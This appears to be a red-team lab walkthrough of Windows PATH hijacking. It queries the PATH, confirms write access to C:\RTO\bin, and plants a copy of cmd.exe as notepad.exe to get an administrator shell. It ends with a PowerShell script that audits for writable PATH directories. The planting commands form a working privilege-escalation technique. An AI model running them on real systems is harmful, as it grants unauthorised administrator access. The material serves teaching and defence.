First: take a look at the system PATH environment variable
reg query "HKLM\System\CurrentControlSet\Control\Session Manager\Environment"

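Notice that the PATH contains an entry for C:\RTO\Bin. If we can write to that folder, we can hijack the execution of any program that is launched by name and resolved through the PATH search. PATH entries are searched in order, so this works when C:\RTO\Bin is listed ahead of the folder that holds the real binary.
Second: check whether we have write access to that folder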
icacls C:\RTO\bin

And we have Modify access to that folder.
Third: copy your malicious payload to that folder
copy c:\Windows\System32\cmd.exe C:\RTO\bin\notepad.exe

Now anyone who uses CMD and tries to open Notepad will get a new CMD session instead. Let's try this as an admin:
notepad.exe

And we are running as administrator.
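
To find this condition before someone abuses it, the two checks above (reading the PATH from the Session Manager key and inspecting the folder ACL) can be run over every PATH entry at once. The following PowerShell is an added example, not part of the original write-up; the list of trusted principals and the English account names in it are assumptions to adjust for your environment.

```powershell
# Added defensive example: audit the machine PATH for directories that
# non-administrative principals can write to.
$envKey = 'HKLM:\System\CurrentControlSet\Control\Session Manager\Environment'
$dirs = @((Get-ItemProperty -Path $envKey -Name Path).Path -split ';' |
    Where-Object { $_.Trim() } | ForEach-Object { $_.Trim().TrimEnd('\') })

# Assumption: only these principals are expected to hold write rights.
$trusted = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'

# WriteData (create files), AppendData (create folders), GENERIC_ALL, GENERIC_WRITE.
$writeMask   = 0x2 -bor 0x4 -bor 0x10000000 -bor 0x40000000
$inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

# PATH is searched in order, so note where System32 sits.
$sys32  = Join-Path $env:SystemRoot 'System32'
$sysIdx = -1
for ($i = 0; $i -lt $dirs.Count; $i++) {
    if ($dirs[$i] -ieq $sys32) { $sysIdx = $i; break }
}

$findings = for ($i = 0; $i -lt $dirs.Count; $i++) {
    $dir = $dirs[$i]
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        # A missing PATH directory can be hijacked by whoever is able to create it.
        [pscustomobject]@{ Order = $i; Directory = $dir; Principal = '(directory missing)'
                           Rights = ''; BeforeSystem32 = ($i -lt $sysIdx) }
        continue
    }
    foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.PropagationFlags -band $inheritOnly) { continue }  # not applied to the folder itself
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        [pscustomobject]@{ Order = $i; Directory = $dir
                           Principal = $ace.IdentityReference.Value
                           Rights = $ace.FileSystemRights
                           BeforeSystem32 = ($i -lt $sysIdx) }
    }
}

# Any row is a PATH directory that should be locked down or removed from PATH;
# rows with BeforeSystem32 = True can shadow binaries such as notepad.exe.
$findings | Sort-Object Order | Format-Table -AutoSize
```

On the system described above, C:\RTO\bin would be reported with the principal that holds Modify on it; removing that write right or dropping the entry from the machine PATH closes the hijack.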